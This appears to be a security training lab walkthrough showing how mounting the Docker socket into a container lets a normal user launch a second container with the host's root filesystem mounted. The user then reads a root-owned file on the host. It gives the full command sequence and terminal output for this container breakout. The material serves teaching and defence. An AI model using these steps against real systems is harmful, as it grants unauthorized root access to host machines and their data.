You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
A malicious user who gains access to docker.sock of host machine can gain root access to the host machine.
Docker-Socket is responsible for communication with the Docker Service. When the docker-socket is mounted on-to a container, docker containers can be launched from the running container via. the socket causing container breakout
Step 1:
Open Terminal
Step 2:
Run sudo su we45 to login as a normal user.
root@we45:~# sudo su we45
we45@we45:~$
Step 3:
Launch a container by mounting the docker.sock which can be found in /var/run .
docker run -d -v /var/run/docker.sock:/var/run/docker.sock --name helloworld helloworld
Step 4:
View all running containers.
docker ps
we45@we45:~$ docker ps
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
1681e86d567e helloworld:latest "python app.py" About a minute ago Up About a minute 5050/tcp helloworld/tcp helloworld
Step 5:
Run docker exec -it helloworld /bin/bash to exec into a running container.
Inside the helloworld container, docker images and containers of the host machine can be accessed
docker images
docker ps
root@1681e86d567e:/apps# docker ps
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
1681e86d567e helloworld:latest "python app.py" About a minute ago Up About a minute 5050/tcp helloworld/tcp helloworld
root@b412be8326b5:/apps#
Step 7
Launch another container from the helloworld container and mount the root-directory.
docker run -ti -v /:/hostFS ubuntu:16.04 /bin/bash
root@1681e86d567e:/apps# docker run -ti -v /:/hostFS ubuntu:16.04 /bin/bash
root@b412be8326b5:/#
Since docker.sock belongs to the host machine, when a container is launched the mounted root-directory belongs to the host-machine causing container breakout
Step 8:
Run cd /hostFS/root/ to access the mounted host directory. Run ls to check the secret.txt file inside a container.
/ # cd /hostFS/root/
/hostFS/root #
/hostFS/root # ls
secret.txt
Step 9:
Run cat secret.txt to view the content of the file.
/hostFS/root # cat secret.txt
secret
Note: Malicious user now has complete access to the root Filesystem of the host machine.
Step 10:
Run exit multiple times to exit from the container(s).